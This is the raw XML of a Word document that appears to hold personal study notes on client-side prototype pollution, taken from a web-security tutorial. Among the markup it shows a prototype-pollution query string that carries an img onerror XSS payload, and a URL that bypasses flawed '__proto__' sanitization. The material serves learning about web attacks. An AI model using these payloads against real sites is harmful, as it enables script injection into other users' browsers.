      <w:r w:rsidRPr="00E24B43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);</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="329DD933" w14:textId="77777777" w:rsidR="00E24B43" w:rsidRPr="00E24B43" w:rsidRDefault="00E24B43" w:rsidP="00E24B43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E24B43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        product.append(product.name</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00E24B43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);</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="6CA2553D" w14:textId="77777777" w:rsidR="00E24B43" w:rsidRPr="00E24B43" w:rsidRDefault="00E24B43" w:rsidP="00E24B43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E24B43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        productList.append(product</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00E24B43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);</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="2AACEB97" w14:textId="77777777" w:rsidR="00E24B43" w:rsidRPr="00E24B43" w:rsidRDefault="00E24B43" w:rsidP="00E24B43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E24B43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    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46D6BF05" w14:textId="77777777" w:rsidR="00E24B43" w:rsidRPr="00E24B43" w:rsidRDefault="00E24B43" w:rsidP="00E24B43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E24B43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})</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CFB8532" w14:textId="376B0160" w:rsidR="00CB6C5C" w:rsidRPr="000477D2" w:rsidRDefault="00E24B43" w:rsidP="00E24B43">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr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.catch(console.error</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="000477D2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);</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="22531260" w14:textId="67F4BBC6" w:rsidR="00CB6C5C" w:rsidRPr="000477D2" w:rsidRDefault="00CB6C5C" w:rsidP="00424793">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="32D47F09" w14:textId="5DB2628B" w:rsidR="00CB6C5C" w:rsidRPr="000477D2" w:rsidRDefault="00E24B43" w:rsidP="00424793">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000477D2">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>Attack:</w:t>
      </w:r>
      <w:r w:rsidRPr="000477D2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?__proto__[headers][x-username]=&lt;img/src/onerror=alert(1)&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14835793" w14:textId="003126E5" w:rsidR="00CB6C5C" w:rsidRPr="000477D2" w:rsidRDefault="00E24B43" w:rsidP="00424793">
      <w:pPr>
        <w:rPr>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000477D2">
        <w:rPr>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>T</w:t>
      </w:r>
      <w:r w:rsidRPr="000477D2">
        <w:rPr>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>his header is used to set the value of the </w:t>
      </w:r>
      <w:r w:rsidRPr="000477D2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>x-username</w:t>
      </w:r>
      <w:r w:rsidRPr="000477D2">
        <w:rPr>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t> property in the returned JSON file. In the vulnerable client-side code above, this is then assigned to the </w:t>
      </w:r>
      <w:r w:rsidRPr="000477D2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>username</w:t>
      </w:r>
      <w:r w:rsidRPr="000477D2">
        <w:rPr>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t> variable, which is later passed into the </w:t>
      </w:r>
      <w:r w:rsidRPr="000477D2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>innerHTML</w:t>
      </w:r>
      <w:r w:rsidRPr="000477D2">
        <w:rPr>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t> sink</w:t>
      </w:r>
      <w:r w:rsidRPr="000477D2">
        <w:rPr>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78ADC6AD" w14:textId="77777777" w:rsidR="00E24B43" w:rsidRPr="000477D2" w:rsidRDefault="00E24B43" w:rsidP="00424793">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="761A5237" w14:textId="77777777" w:rsidR="000477D2" w:rsidRPr="000477D2" w:rsidRDefault="000477D2" w:rsidP="000477D2">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:after="150"/>
        <w:rPr>
          <w:color w:val="FF6633"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000477D2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF6633"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>Client-side prototype pollution via flawed sanitization</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19F62816" w14:textId="452CD806" w:rsidR="00CB6C5C" w:rsidRPr="000477D2" w:rsidRDefault="000477D2" w:rsidP="00424793">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000477D2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vulnerable-website.com/?__pro__proto__to__.gadget=payload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0765F339" w14:textId="77777777" w:rsidR="000477D2" w:rsidRDefault="000477D2" w:rsidP="000477D2">
      <w:pPr>
        <w:rPr>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000477D2">
        <w:rPr>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>If the sanitization process just strips the string </w:t>
      </w:r>
      <w:r w:rsidRPr="000477D2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>__proto__</w:t>
      </w:r>
      <w:r w:rsidRPr="000477D2">
        <w:rPr>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t> without repeating this process more than once, this would result in the following URL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44CFD847" w14:textId="06BA73FF" w:rsidR="00C3716E" w:rsidRPr="00621E60" w:rsidRDefault="000477D2" w:rsidP="00424793">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:eastAsia="de-DE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000477D2">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Courier New"/>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:bdr w:val="single" w:sz="6" w:space="4" w:color="EAEAEA" w:frame="1"/>
          <w:lang w:eastAsia="de-DE"/>
        </w:rPr>
        <w:t>vulnerable-website.com/?__proto__.gadget=payload</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00C3716E" w:rsidRPr="00621E60" w:rsidSect="00626E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947D7"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="AD8A1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B93482"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="4E5C8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3E54D9"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="BD1C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TextsAlreadyFilled" w:val="True"/>
  </w:docVars>
  <w:rsids>
    <w:rsidRoot w:val="00626EA6"/>
    <w:rsid w:val="00012598"/>
    <w:rsid w:val="000477D2"/>
    <w:rsid w:val="00424793"/>
    <w:rsid w:val="00430AD9"/>
    <w:rsid w:val="005244C7"/>
    <w:rsid w:val="00621E60"/>
    <w:rsid w:val="00626EA6"/>
    <w:rsid w:val="007477E1"/>
    <w:rsid w:val="00A40A64"/>
    <w:rsid w:val="00BA041C"/>
    <w:rsid w:val="00C0337A"/>
    <w:rsid w:val="00C3716E"/>
    <w:rsid w:val="00C83D69"/>
    <w:rsid w:val="00CB6C5C"/>
    <w:rsid w:val="00D573F8"/>
    <w:rsid w:val="00E24B43"/>
    <w:rsid w:val="00FF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486EB"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{312C4C61-3381-47FB-9BB0-1F61074E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A64"/>
    <w:pPr>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
      <w:color w:val="00000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A64"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:before="24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A64"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:before="4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A64"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:before="40"/>
      <w:outlineLvl w:val="2"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="majorEastAsia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A64"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:before="40"/>
      <w:outlineLvl w:val="3"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts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A64"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:before="40"/>
      <w:outlineLvl w:val="4"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts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A64"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:before="40"/>
      <w:outlineLvl w:val="5"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="majorEastAsia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A64"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:before="40"/>
      <w:outlineLvl w:val="6"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="majorEastAsia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A64"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:before="4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A64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32"/>
      <w:szCs w:val="3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2Char">
    <w:name w:val="Heading 2 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading2"/>
    <w:uiPriority w:val="9"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6"/>
      <w:szCs w:val="26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4"/>
      <w:szCs w:val="24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72727" w:themeColor="text1" w:themeTint="D8"/>
      <w:w w:val="100"/>
      <w:kern w:val="0"/>
      <w:sz w:val="21"/>
      <w:szCs w:val="21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72727" w:themeColor="text1" w:themeTint="D8"/>
      <w:w w:val="100"/>
      <w:kern w:val="0"/>
      <w:sz w:val="21"/>
      <w:szCs w:val="21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grey">
    <w:name w:val="grey"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00424793"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="NormalWeb">
    <w:name w:val="Normal (Web)"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00430AD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de-DE" w:eastAsia="de-DE"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Hyperlink">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00430AD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30AD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F28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swigger.net/web-security/prototype-pollution/what-is-prototype-pollu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itter.com/share?url=https%3a%2f%2fportswigger.net%2fweb-security%2fprototype-pollution%2fwhat-is-prototype-pollution&amp;text=What+is+prototype+pollution%3f+%7c+Web+Security+Academy%0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ortswigger.net/web-security/cross-site-scrip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swigger.net/web-security/prototype-pollution/what-is-prototype-pollutio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1066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To.Nguyen Truong An IT-QF</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>To.Nguyen Truong An IT-QF</cp:lastModifiedBy>
  <cp:revision>9</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2022-11-14T20:22:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-11-17T09:39:00Z</dcterms:modified>
</cp:coreProperties>
</file>